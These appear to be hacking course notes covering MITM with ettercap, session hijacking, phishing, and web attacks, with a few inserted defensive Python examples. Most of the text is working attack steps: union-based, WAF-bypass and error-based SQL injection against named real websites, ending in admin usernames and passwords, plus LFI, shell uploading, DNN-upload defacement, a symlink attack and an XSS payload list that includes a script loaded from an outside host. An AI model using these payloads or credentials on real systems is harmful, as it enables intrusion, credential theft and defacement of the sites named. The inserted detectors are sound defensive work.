   Unlock the bootloader of your device: http://forum.xda-developers.com/showthread.php?t=2440597
   Download ClockworkMod Recovery from http://forum.xda-developers.com/showthread.php?t=2702001 and flash it using fastboot
   Reboot to recovery and flash the SuperSU root zip from http://forum.xda-developers.com/showthread.php?t=1538053


3. Jailbreaking iOS (Apple)

Jailbreak 7, 7.0.3, 7.0.4 untethered for iPhone 5s, 5c, 5, iPad and iPod touch (Guide)

STEP 1: Download Evasi0n7 for Mac OS X/Windows. *new version here*
STEP 2: Download your iOS 7.x.x from our download page.
STEP 3: Make sure to back up all your data on your iPhone using iTunes or iCloud before using the Evasi0n7 untethered jailbreak.
STEP 4: Launch Evasi0n7 and plug your device into the computer, then click on the "Jailbreak" button.
STEP 5: Now Evasi0n7 will start the jailbreak process, so sit back and enjoy.
STEP 6: Evasi0n7 will reboot your device.
STEP 7: After that is done, an Evasi0n7 app will appear on your iPhone's home screen. Tap on it.
STEP 8: Your device will be rebooted again.
STEP 9: Evasi0n7 will continue processing your jailbreak and will reboot your iPhone several times until the jailbreak is done.
STEP 10: And you are ready to go.

SOURCE : http://www.redsn0w.us/2013/12/jailbreak-7-703-704-untethered-for.html

Supported devices : For both Mac OS X and Windows, you can now jailbreak your iOS 7.x device with the one-click Evasi0n7 jailbreak tool.

Jailbreak devices:
   iPhone 5s
   iPhone 5c
   iPhone 5
   iPhone 4S
   iPhone 4
   iPad 2
   iPad 3
   iPad 4
   iPad Air
   iPad mini
   iPad mini 2
   iPod touch 5


4. Smartphone Pentest Framework Master Link : https://github.com/georgiaw/Smartphone-Pentest-Framework


Sniffing

1. Man In The Middle Attack Using Ettercap

Tools :
   1] Wireshark
   2] ettercap
   3] Cain & Abel

1] Ettercap :
   > vi /etc/etter.conf
   > set : ec_uid = 0
   > set : ec_gid = 0      [ so ettercap keeps root and can rewrite traffic ]
   > in the "linux" section, uncomment the iptables redir_command_on / redir_command_off lines ( remove the # )
   > ettercap -G [ opens ettercap in graphical mode ]
   > Sniff / Unified sniffing / choose interface
   > Hosts / Scan for hosts / Host list
   > add the router IP to Target 1 & the rest (the victims) to Target 2
   > MITM / ARP poisoning
   > Start sniffing

2] Wireshark :
   > open Wireshark
   > start sniffing
   > filter protocols [ http, ftp, smtp etc. ] => http://wiki.wireshark.org/DisplayFilters
   > http.request.method == "POST"
   > tcp.port eq 25 or icmp
   > ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
   > tcp.window_size == 0 && tcp.flags.reset != 1
   > smb || nbns || dcerpc || nbss || dns
   > ip.addr == 10.43.54.65
   > ip.addr != 10.43.54.65

NOTE : Analyzing traffic using Wireshark


Step1 : Open Wireshark

Step2 : Choose Interface and Start Sniffing


Step3 : Filtering Protocols

Step4 : Follow the tcp stream


Step5: Check the Header


3. Man In The Middle Attack Using Xplico :

Tools needed
   1. Ettercap
   2. Xplico

Victim info :
   Victim -> 192.168.1.21
   arp -a -> aa-aa-aa-aa-aa-aa
   gateway -> 192.168.1.1

apt-get update
apt-get upgrade

1. ettercap -G
   > Sniff
   > Unified sniffing
   > select interface
   > Hosts
   > Scan for hosts
   > Host list
   > add the default gateway to Target 1
   > add .21 <victim> to Target 2
   > MITM
   > ARP poisoning
   > OK

2. In a terminal -> IP forwarding, so the victim's traffic still reaches the gateway through you
   # echo 1 > /proc/sys/net/ipv4/ip_forward

3. BackTrack > Forensics > Network Forensics > xplico web GUI
   > http://localhost:9876/
   > u : xplico   p : xplico
   > Case
   > Live acquisition
   > Case name : Anything > Create
   > click on your case, e.g. Anything
   > New Session
   > Session name : xyz
   > click on session xyz
   > At Live :
   > Interface


   > lo, eth0, wlan0 ... etc.

NOTE : While the victim is browsing, all of its sessions are reassembled and saved by Xplico.
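Added example (not from the original notes): the ARP poisoning that ettercap performs in the steps above, seen from the defender's side. Frames are built and parsed as raw Ethernet/ARP bytes, so the same parser works on what a raw socket or pcap hands over; the capture, the MAC addresses and the trusted gateway entry (what `arp -a` showed before the attack) are constructed for the demo.

```python
import socket
import struct
from collections import defaultdict


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def arp_frame(sender_mac, sender_ip, target_mac, target_ip, op):
    """Ethernet + ARP (RFC 826) frame, the unit ettercap forges to poison caches."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + b"\x08\x06"
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1 if op == "request" else 2)
           + mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
           + mac_bytes(target_mac) + socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame):
    """(sender_mac, sender_ip, op) for an ARP frame, None for anything else."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    op = struct.unpack("!H", frame[20:22])[0]
    sender_mac = frame[22:28].hex(":")
    sender_ip = socket.inet_ntoa(frame[28:32])
    return sender_mac, sender_ip, "request" if op == 1 else "reply"


def detect_arp_spoof(frames, trusted=None):
    """Alert on (a) replies contradicting a static `trusted` {ip: mac} table and
    (b) any IP that is answered for by more than one MAC. Only replies update
    state, because replies are what poison a cache."""
    trusted = dict(trusted or {})
    seen = defaultdict(set)
    alerts = []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        mac, ip, op = parsed
        if op != "reply":
            continue
        if ip in trusted and mac != trusted[ip]:
            alerts.append(f"{ip} claimed by {mac}, static entry says {trusted[ip]}")
        if mac not in seen[ip]:
            seen[ip].add(mac)
            if len(seen[ip]) > 1:
                alerts.append(f"{ip} now answered by {len(seen[ip])} MACs: {sorted(seen[ip])}")
    return alerts


GATEWAY, VICTIM, ATTACKER = "aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb", "0c:0c:0c:0c:0c:0c"
BCAST = "ff:ff:ff:ff:ff:ff"

# Constructed capture: normal traffic, then the two-sided poison ettercap sends
# (attacker tells the victim "I am the gateway" and the gateway "I am the victim").
SAMPLE_FRAMES = [
    arp_frame(VICTIM, "192.168.1.21", BCAST, "192.168.1.1", "request"),    # who has 1.1?
    arp_frame(GATEWAY, "192.168.1.1", VICTIM, "192.168.1.21", "reply"),
    arp_frame(VICTIM, "192.168.1.21", GATEWAY, "192.168.1.1", "reply"),
    arp_frame(ATTACKER, "192.168.1.1", VICTIM, "192.168.1.21", "reply"),   # poison victim
    arp_frame(ATTACKER, "192.168.1.21", GATEWAY, "192.168.1.1", "reply"),  # poison gateway
    arp_frame(GATEWAY, "192.168.1.1", VICTIM, "192.168.1.21", "reply"),    # real gateway again
]


def demo():
    return detect_arp_spoof(SAMPLE_FRAMES, trusted={"192.168.1.1": GATEWAY})


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The static-entry check is the only one that fires on the very first forged reply; the one-IP-many-MACs check needs the legitimate host to have spoken first, which is why arpwatch-style tools keep a baseline of the segment.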

4. driftnet -i eth0   [ shows the images passing through the sniffed traffic ]

5. Session Hijacking
   Session tokens = 128-256 bit random values; whoever holds the token is the user, no password needed.
   1. Cookies > Wireshark filter : http.cookie contains "datr"
      > http.cookie && ip.src==<target IP>   -----> check for : 1012 GET / HTTP/1.1
   2. <SCRIPT>alert(document.cookie);</SCRIPT>   [ XSS vulnerability: read the cookie from inside the browser ]
   3. Fiddler
      Step 1 : Open Fiddler


Step 2 : Tick the https Decryption Check Box

Step 3 : Take Your Victim Traffic


Step 4 : Pull out the victim's cookies
Step 5 : The attacker replaces his own cookies with them using the Cookies Editor add-on in Firefox and is logged in as the victim.
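Added example (not from the original notes): a check of a Set-Cookie header that says whether the cookie theft described above (sniffing it with Wireshark, reading it with document.cookie, replaying it in Cookies Editor) would work, plus the server-side way to mint a token that resists it. The two headers are constructed; the entropy figure is an upper bound taken from the token's alphabet, not a measurement of how the server generated it.

```python
import math
import secrets


def parse_set_cookie(header):
    """Split a Set-Cookie value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def estimate_token_bits(token):
    """Rough upper bound on the entropy a token can carry, from its alphabet:
    hex -> 4 bits/char, base64/urlsafe -> 6, otherwise log2(alphabet size)."""
    if not token:
        return 0
    if all(c in "0123456789abcdefABCDEF" for c in token):
        per_char = 4
    elif all(c.isalnum() or c in "-_+/=" for c in token):
        per_char = 6
    else:
        per_char = math.log2(len(set(token)))
    return int(per_char * len(token))


def audit_session_cookie(header, min_bits=128):
    """Findings that make a session cookie stealable in the ways described above."""
    name, value, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append("no Secure flag: sent over plain HTTP, readable by a sniffer / MITM")
    if "httponly" not in attrs:
        findings.append("no HttpOnly flag: injected JS can read document.cookie")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: cross-site requests carry the cookie")
    bits = estimate_token_bits(value)
    if bits < min_bits:
        findings.append(f"{name} value carries at most ~{bits} bits, guessable; want >= {min_bits}")
    return findings


def issue_session_cookie(name="session", nbytes=16):
    """How the server should mint it: 16 CSPRNG bytes = 128 bits, all flags set."""
    return f"{name}={secrets.token_hex(nbytes)}; Path=/; Secure; HttpOnly; SameSite=Lax"


# Constructed headers: one from a weak app, one minted by issue_session_cookie().
WEAK_HEADER = "PHPSESSID=12345; Path=/"
GOOD_HEADER = issue_session_cookie()


if __name__ == "__main__":
    print(audit_session_cookie(WEAK_HEADER))   # four findings
    print(audit_session_cookie(GOOD_HEADER))   # []
```

HttpOnly defeats the document.cookie trick but not Fiddler or Wireshark; Secure defeats the sniffer but not XSS; only the combination, with a token long enough that guessing is hopeless, closes all three routes listed above.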


Social Engineering

1. Human based
2. Computer based

1. Human based :
   > There is no patch for human stupidity.
   > Social engineering is the human side of breaking into a corporate network.

   1. Posing as a legitimate end user > gives an identity and asks for sensitive information.
   2. Posing as an important user > as a VIP, CFO, CEO etc.
   3. Posing as technical support > calls as technical support staff and requests the ID & password.
   4. Eavesdropping > unauthorized listening to conversations or reading of messages.
   5. Shoulder surfing > looking over your shoulder as you enter a password.
   6. Dumpster diving > searching for sensitive information in the target company's :
      > trash bins
      > printer trash bins
      > sticky notes
      > phone bills
      > contact information
      > financial information
   7. Tailgating > an unauthorized person wearing a fake ID badge enters a secured area by closely following an authorized person through a door requiring key access.
   8. Piggybacking > "I forgot my ID badge at home. Please help me."


2. Computer based social engineering :
   > mail / attachments
   > Trojans
   > keyloggers
   > pop-up windows
   > phishing
   > hoaxes and chain letters
   > websites / sweepstakes
   > spam mails

Eg. Phishing
   Step 1 : Create a fake Facebook page.
   Step 2 : Save the page's source code in Notepad.


Step 3 : Find " login.php?login_attempt=1 "


2. Tabnabbing


Web-servers & Web-application Hacking

1] SQL Injection

2] Exploiting hidden elements [ tool : Web Developer add-on ] > for manipulating HTML elements, tags, forms etc. on a website.
   > Eg: woodlandworldwide.com [ vulnerable site ]

3] PHP source disclosure > look for a vulnerable site like
   [ http://hrithikrules.com/displayArt.php?fname=filmography/krrish2/permission.txt&dirname=main ]
   > now [ http://hrithikrules.com/displayArt.php?fname=index.php ]   ( the script is made to read out its own source )

4] XSS [ Cross Site Scripting ] [ put JS into search boxes, URLs etc. ] > http://www.hrithikrules.com/ [ put the JS into its search box and it is reflected back into the page ]
   > <script>alert("hacked")</script>
   --------> BeEF [ tool ] [ BackTrack ] [ start the server, attach your hook link to the XSS iframe script and send it to another user on the LAN ]
   --------> Download BeEF -> upload it to a free hosting site -> get your link -> attach it to the XSS ---> send it anywhere in the world.
   > <iframe src="http://www.world4free.in"></iframe>

4.1] XSS Shell

5] LFI / RFI [ file inclusion ] [ tool : wAppex ]
   > http://www.hrithikrules.com/displayArt.php?fname=filmography/mohenjodaro/research.txt&dirname=main
   > http://www.hrithikrules.com/displayArt.php?fname=../../../../../../../../../../../../../../etc/passwd
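Added example (not from the original notes): the server-side check that stops the ../../etc/passwd include above, and a detection-side test for traversal in logged fname values that also catches the URL-encoded and double-encoded forms a WAF signature on the literal "../" misses. The base directory and the sample parameters are constructed; only the first one is the legitimate shape the page uses.

```python
import os
from urllib.parse import unquote


def safe_include(base_dir, user_path):
    """Resolve a user-supplied file name under base_dir and refuse anything that
    ends up outside it. Returns the absolute path to open."""
    if "\x00" in user_path:                       # NUL truncation trick (old PHP)
        raise PermissionError("NUL byte in path")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    # realpath collapses every .. and symlink first, so this compares real locations
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"{user_path!r} escapes {base}")
    return target


def looks_like_traversal(raw_param):
    """Detection-side check for a logged/captured query parameter.
    Decodes twice so %252e%252e%252f (double encoding) is caught as well."""
    decoded = unquote(unquote(raw_param))
    segments = decoded.replace("\\", "/").split("/")
    return ".." in segments or decoded.startswith("/") or "\x00" in decoded


# Constructed requests in the shape of the displayArt.php?fname= parameter above.
SAMPLE_FNAMES = [
    "filmography/krrish2/permission.txt",                      # legitimate
    "../../../../../../../../../../../../../../etc/passwd",    # the payload above
    "%2e%2e%2f%2e%2e%2fetc%2fpasswd",                          # URL-encoded
    "%252e%252e%252fetc%252fpasswd",                           # double-encoded
    "/etc/passwd",                                             # absolute path
    "index.php%00.txt",                                        # NUL truncation
]


def triage(fnames=SAMPLE_FNAMES):
    return {f: looks_like_traversal(f) for f in fnames}


if __name__ == "__main__":
    print(triage())
    print(safe_include("/var/www/html", "filmography/krrish2/permission.txt"))
```

Rejecting "../" as a string is not enough on its own: the safe_include check works on the resolved path, so it also catches an absolute path, a symlink inside the web root, and any encoding the web server has already decoded before the script sees it.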

6] DNN Portal Hacking

7] Shell uploading > do SQL injection first to find the admin password for the site.


   > now open the website and find any page which uploads something [ multimedia uploading ]
   > upload your shell [ .php, .aspx, .asp, .jsp ]

NOTE : sometimes the shell cannot be uploaded directly, so rename its extension to an allowed file type, run the "Tamper Data" Firefox add-on while uploading, and strip the added extension from the intercepted request.
   > eg : http://www.arenamultimedia.in/news.aspx?id=news

===========================================================

1. SQL Injection : www.mags.edu.in/aboutus.php?id=2

   www.mags.edu.in/aboutus.php?id=2'              |<-- Error (the quote breaks the query: the parameter goes straight into the SQL)
   www.mags.edu.in/aboutus.php?id=2 order by 1    |<-- No error
   www.mags.edu.in/aboutus.php?id=2 order by 100  |<-- Error
   www.mags.edu.in/aboutus.php?id=2 order by 10   |<-- Error
   www.mags.edu.in/aboutus.php?id=2 order by 2    |<-- Error + page content

   So the query returns a single column. Now find the vulnerable column directly...

   www.mags.edu.in/aboutus.php?id=2 union select 1    |<-- Shows nothing (the real row is printed, not the union row)
   www.mags.edu.in/aboutus.php?id=-2 union select 1   |<-- Vulnerable column = 1 (no row has id -2, so the page prints the union row)
   www.mags.edu.in/aboutus.php?id=-2 union select 1,2 |<-- Error (column count mismatch)

Now,

1. Find the database version
   > www.mags.edu.in/aboutus.php?id=-2 union select @@version   | 5.0.96-log

2. Find the database name
   > www.mags.edu.in/aboutus.php?id=-2 union select database()   | magschool

3. List the tables in the database
   www.mags.edu.in/aboutus.php?id=-2 union select group_concat(table_name) from information_schema.tables where table_schema=database()

   amaps_admin -----> 0x616d6170735f61646d696e (the name as hex, usable without quotes), campusphotos, categories, celebration, contentmanagement, courses, domains, engineering, events, facilities, faculty, medmain, news, pending, query_log, register_form, site_category, sites, temp

4. List the columns in a table
   www.mags.edu.in/aboutus.php?id=-2 union select group_concat(column_name) from information_schema.columns where table_name=0x616d6170735f61646d696e

   adminid, username, password

5. Pull out the username & password :
   www.mags.edu.in/aboutus.php?id=-2 union select group_concat(adminid,0x3a,username,0x3a,password) from amaps_admin
   [ 0x3a is ':' ]

   adminid = 1
   username = adminmags
   password = magsmet#749$

______________________________________________________________________________

2. SQL Injection WAF Bypass

http://www.geca.ac.in/departments/hod.php?id=14

http://www.geca.ac.in/departments/hod.php?id=14'

http://www.geca.ac.in/departments/hod.php?id=14 order by 1

http://www.geca.ac.in/departments/hod.php?id=14 order by 2

http://www.geca.ac.in/departments/hod.php?id=14 order by 3

http://www.geca.ac.in/departments/hod.php?id=14 order by 4

http://www.geca.ac.in/departments/hod.php?id=14 order by 5

http://www.geca.ac.in/departments/hod.php?id=14 order by 6

http://www.geca.ac.in/departments/hod.php?id=14 order by 7

http://www.geca.ac.in/departments/hod.php?id=14 order by 8

http://www.geca.ac.in/departments/hod.php?id=14 order by 9

-----------------------------------------------------------

www.geca.ac.in/departments/hod.php?id=14 union select 1,2,3,4,5,6,7,8,9


Not Acceptable! | An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

So,

www.geca.ac.in/departments/hod.php?id=14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9

www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9

Vulnerable Columns = 6,3,5

=====================================================================

www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union select*//**/1,2,3,4,@@version,6,7,8,9

Version = 5.1.57-rel12.8-log

=====================================================================

Finding Tables :

http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tables*/+where+/*!table_schema*/+like+database()

about_aurangabad

admin_login

album

assignment

login

---------------------------------------------------------------------------------------------------

Finding Tables Using Limit :

http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tables*/+where+/*!table_schema*/+like+database()+limit+1,1

Limit increment like -> 1,1 , 1,2 , 1,3 , 1,4 etc.

admin_login --------------> 0x61646d696e5f6c6f67696e

=====================================================================

http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,column_name,6,7,8,9+from+/*!information_schema.columns*/+where+/*!table_name*/+like+0x61646d696e5f6c6f67696e

admin_id

user_name

pass_word

fname

lname

email

backpage

----------------------------------------------------------------------------------------------------

Using Limit :

http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,column_name,6,7,8,9+from+/*!information_schema.columns*/+where+/*!table_name*/+like+0x61646d696e5f6c6f67696e+limit+1,1

Limit increment like -> 1,1 , 1,2 , 1,3 , 1,4 etc.

user_name

=====================================================================

http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,admin_id,6,7,8,9+from+admin_login

admin_id = 1

---------------------------------------------------------------------------------------------------------------------

http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,user_name,6,7,8,9+from+admin_login

user_name = admin@325

---------------------------------------------------------------------------------------------------------------------

http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,pass_word,6,7,8,9+from+admin_login

pass_word = z9xexTqZk%+-328123z9xexTqZk%+-328123

---------------------------------------------------------------------------------------------------------------------

http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,fname,6,7,8,9+from+admin_login

fname = shriram

---------------------------------------------------------------------------------------------------------------------

http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,lname,6,7,8,9+from+admin_login

lname = chaudhari

---------------------------------------------------------------------------------------------------------------------

http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,email,6,7,8,9+from+admin_login

email = [email protected]

---------------------------------------------------------------------------------------------------------------------

http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,backpage,6,7,8,9+from+admin_login

backpage =index.php

---------------------------------------------------------------------------------------------------------------------

3. Xpath Injection http://zerofreak.blogspot.in/2012/02/tutorial-by-zer0freak-zer0freak-sqli.html

Step 1: Inject --> +and extractvalue(rand(),concat(0x0a,version()))--


Eg:

http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,version()))--

msg: Could not query:XPATH syntax error: ' 5.5.32-cll'

=====================================================================

Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+

Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+

msg: Could not query:XPATH syntax error: ' :RecipeIngredients'

-----------------------------------------------------------------------

Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...

Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+

msg: Could not query:XPATH syntax error: ' :SS_categories'

------------------------------------------------------------------------

Respectively :~ For 2,3,4,5,6,7,8.....

msg : Could not query:XPATH syntax error: ' :SS_ordered_carts'

Could not query:XPATH syntax error: ' :SS_orders'

Could not query:XPATH syntax error: ' :SS_products'

Could not query:XPATH syntax error: ' :SS_products2'

Could not query:XPATH syntax error: ' :SS_special_offers'

Could not query:XPATH syntax error: ' :categories'

Could not query:XPATH syntax error: ' :details'

Could not query:XPATH syntax error: ' :productrange'

Could not query:XPATH syntax error: ' :recipes'


Could not query:XPATH syntax error: ' :visitors'

=====================================================================

Note : Convert table name to HEX [String to hex conversion]

Eg : details : 64657461696c73 or 0x64657461696c73

=====================================================================

Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name=0x64657461696c73 limit 0,1)))--+

Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from /*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit 0,1)))--+

msg: Could not query:XPATH syntax error: ' :cust_firstname'

----------------------------------------------------------------

Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...

Respectively :~ For 2,3,4,5,6,7,8.....

msg: Could not query:XPATH syntax error: ' :cust_lastname'

msg: Could not query:XPATH syntax error: ' :cust_country'

msg: Could not query:XPATH syntax error: ' :cust_zip'

msg: Could not query:XPATH syntax error: ' :cust_state'

msg: Could not query:XPATH syntax error: ' :cust_city'

msg: Could not query:XPATH syntax error: ' :cust_address'

msg: Could not query:XPATH syntax error: ' :cust_phone'

=====================================================================

Note : I got

Table -> users

Columns -> Password & Email


So,

=====================================================================

Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select concat(email,0x3a,password) from users limit 0,1)))--+

Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from /*!users*/ limit 0,1)))--+

msg: Could not query:XPATH syntax error: ' :email:password'
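A defender-side check for the probes in sections 1-3, added here as an example and not part of the original notes: it normalises request URIs from a web-server access log (URL decoding plus stripping the /**/ and /*!12345...*/ comment tricks used above against ModSecurity, whose contents MySQL still executes) and then matches the quote test, ORDER BY counting, UNION SELECT, information_schema, fingerprinting and extractvalue() patterns the walkthroughs use. The log lines, IP addresses and rule names are constructed.

```python
"""Flag the SQL injection probes shown in sections 1-3 in access-log lines.

Added example, not from the original notes. Sample log lines are constructed
from the notes' own request paths.
"""
import re
from urllib.parse import unquote_plus

# /*!12345 and /*! open "executable" comments: drop the opener but keep the body.
# Plain /* ... */ comments and stray closers are replaced by whitespace.
MYSQL_COMMENT_RE = re.compile(r"/\*!\d*|\*/|/\*.*?\*/", re.S)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

RULES = [
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+\b")),
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b")),
    ("error_based", re.compile(r"\bextractvalue\s*\(")),
    ("fingerprint", re.compile(r"@@version|\bdatabase\(\)|\bgroup_concat\s*\(")),
    ("quote_probe", re.compile(r"=\d+'")),
]


def normalize_uri(uri: str) -> str:
    """URL-decode, neutralise comment obfuscation, collapse whitespace, lowercase."""
    decoded = unquote_plus(uri)
    stripped = MYSQL_COMMENT_RE.sub(" ", decoded)
    return re.sub(r"\s+", " ", stripped).strip().lower()


def classify_request(log_line: str) -> list:
    """Names of the rules that fire for one access-log line (empty if benign)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    uri = normalize_uri(m.group(1))
    return [name for name, pattern in RULES if pattern.search(uri)]


def analyze(log_text: str) -> list:
    """(line number, rule names) for every line that triggers at least one rule."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        rules = classify_request(line)
        if rules:
            hits.append((number, rules))
    return hits


# Constructed sample log (Apache-style); the paths mirror the notes' walkthrough.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Dec/2014:10:00:01 +0530] "GET /aboutus.php?id=2 HTTP/1.1" 200 5120
203.0.113.5 - - [31/Dec/2014:10:00:04 +0530] "GET /aboutus.php?id=2' HTTP/1.1" 500 311
203.0.113.5 - - [31/Dec/2014:10:00:09 +0530] "GET /aboutus.php?id=2%20order%20by%2010 HTTP/1.1" 500 311
203.0.113.5 - - [31/Dec/2014:10:00:15 +0530] "GET /aboutus.php?id=-2%20union%20select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database() HTTP/1.1" 200 2210
203.0.113.5 - - [31/Dec/2014:10:01:02 +0530] "GET /departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,@@version,6,7,8,9 HTTP/1.1" 200 4870
203.0.113.5 - - [31/Dec/2014:10:02:40 +0530] "GET /recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,version()))-- HTTP/1.1" 500 208
198.51.100.7 - - [31/Dec/2014:10:03:00 +0530] "GET /news.aspx?id=news HTTP/1.1" 200 3100
"""

if __name__ == "__main__":
    for number, rules in analyze(SAMPLE_LOG):
        print(f"line {number}: {', '.join(rules)}")
```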

=====================================================================

4. DNN Portal Hacking

1 : inurl:tabid/176/Default.aspx

2 : inurl:"/portals/0/" site:.com

3 : inurl:/tabid/36/language/en-US/Default.aspx

4 : inurl:/portals/0/default.aspx

5 : DNN(Link Gallery)

6 : inurl:/tabid/36/language/en-US/Default.aspx

7 : inurl:fcklinkgallery.aspx

step 1 : http://www.parallax.com/tabid/768/productid/92/default.aspx [ Find a website with the above vulnerabilities ]

> Replace : /tabid/768/productid/92/default.aspx

> With : /Providers/Htmleditorproviders/fck/fcklinkgallery.aspx

step 2 : http://www.parallax.com/Providers/Htmleditorproviders/fck/fcklinkgallery.aspx

step 3 : click on File (A File On Your Site) and then replace the link with -->

javascript:__doPostBack('ctlURL$cmdUpload','')

step 4 : you will see the upload button. Upload { shell , deface it , put your signature }

step 5: http://www.parallax.com/portals/0/shadow.txt

5. Symlink Attack

1] Upload shell 404.php on your hacked website and root the webserver.

2] Upload contact.php & database.php

> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php


> eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php

3] go to [sec. info] in your shell, then [readable : etc/passwd <view>]

4] copy all the username & passwd entries from [ etc/passwd ]

5] paste in [ http://site.com/contact.php ] [ config fucker ] tab.

6] now open both of your links : [ http://site.com/database.php & http://site.com/configweb ]

> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php

> eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/

7] on the configweb page [ you have some text files that contain user & password ] [ these files are the details of the reverse/linked websites ]

8] Now log in to them using database.php [ change the password in the database ]

9] then log in to the main site and deface its index.php page.

6. XSS

1. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

2. <IMG SRC="javascript:alert('XSS');">

3. <IMG SRC=javascript:alert('XSS')>

4. <IMG SRC=JaVaScRiPt:alert('XSS')>

5. <IMG SRC=JaVaScRiPt:alert('XSS')>

6. <IMG SRC=javascript:alert(&quot;XSS&quot;)>

7. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

8. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">

10. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

11. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

12. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

13. <IMG SRC="javascript:alert('XSS');">

==========================================================================

Hands On Series – Cross Site Scripting (XSS) Part 1

In this episode we start dealing with Cross Site Scripting (XSS) attacks.


CSS = Cascading Style Sheets

XSS = Cross Site Scripting

Cross Site Scripting is a technique used to add script to a trusted site that will be executed in other users' browsers.

A key element to XSS is that one user can submit data to a website that will later be displayed for other users.

It is necessary that the bad guy NOT mess up the HTML structure, otherwise the result will be web defacement rather than attacking other users.

The hackme site has been updated and improved (more about that in a moment)

and now includes a section for XSS which we will be using in this episode.

As usual, for the “Hands on Series” I recommend that you listen to these episodes while viewing the hacking test site and have the show notes visible and ready to cut and paste from.

If we look at the source for the page we will see this:

Let's start by trying to somehow add an attribute so that when someone mouses over the name, the javascript will be executed.

----------------------------------------------------------------------------------------------------------------------------

Attack #1 – Against Email Address

=================================

Attack 1: Original

<a href="mailto:[email protected]">John Doe</a>

Attack 1: Desired addition

